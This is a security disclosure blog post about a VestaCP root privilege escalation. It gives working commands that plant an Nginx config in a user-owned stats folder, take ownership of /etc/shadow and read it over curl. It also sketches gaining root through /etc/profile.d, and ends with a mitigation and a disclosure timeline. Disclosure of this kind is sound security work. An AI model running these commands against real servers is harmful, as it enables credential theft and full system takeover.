VestaCP - Root Privilege Escalation

VestaCP currently has a bug that allows root privilege escalation using PHP.

Background:

Even with stats disabled, the following line is found in /home/<user>/conf/web/nginx.conf:

        include /home/<user>/web/<domain>/stats/auth.conf*;

/home/<user>/web/<domain>/stats/ is owned by <user> but isn't writable. Since we own it, we can simply change the permissions so we can put anything we want in there. From there we can create a configuration file that will be loaded by Nginx and change the ownership of arbitrary files on the system.

Exploit

With PHP, execute (running as <user> by default):

chmod u+w  /home/<user>/web/<domain>/stats/
echo 'client_body_temp_path /etc/shadow; location /vstats/steal { alias / ; }' >  /home/<user>/web/<domain>/stats/auth.conf.evil

Once Nginx is reloaded/restarted, /etc/shadow will be owned by nginx, which can then be read by using curl http://<domain>/vstats/steal/etc/shadow. This is due to the client_body_temp_path directive which causes Nginx to change the owner of the target file from the master process (running as root). For more information, see my earlier blog post.

Beyond leveraging this to steal the shadow file, you can gain root privileges by editing system files that execute as privileged users. For example, files in /etc/profile.d
The machinery looks something like this:

client_body_temp_path /etc/profile.d/vim.sh;
location /evil {
   error_log /etc/profile.d/vim.sh;
}

Once Nginx is restarted, you can triggers errors using curl (such as 404s) and attempt to have it write something that bash will execute. This is largely a trial and error process and is left as an exercise for the reader.

Mitigation

Simply change the owner of the stats folder to mitigate this exploit (this may stop stats from updating):

chown root:root /home/*/web/*/stats

Disclosure Notes

March 13, 2017: Reported
March 13, 2017: Received response from VestaCP (awesome response time!). Sent details of exploit and request to coordinate embargo period
November 2, 2017: No response to follow up e-mails, public disclosure
November 8, 2017: Added mitigation, VestaCP is working on a fix

VestaCP - Root Privilege Escalation

Christopher Tarquini

Christopher Tarquini

Background:

Exploit

Mitigation

Disclosure Notes

Data Breach Survival Guide: 7 Tips To Get Through It

Handlebars 4.1.2: Command Execution

Bypassing MaxScale's Firewall and Masking Rules

Prevent Tab-Nabbing with Minimal Overhead

Nginx Catch-All Error Pages

Background:

Exploit

Mitigation

Disclosure Notes

Subscribe to Christopher Tarquini's Blog

Subscribe to Christopher Tarquini's Blog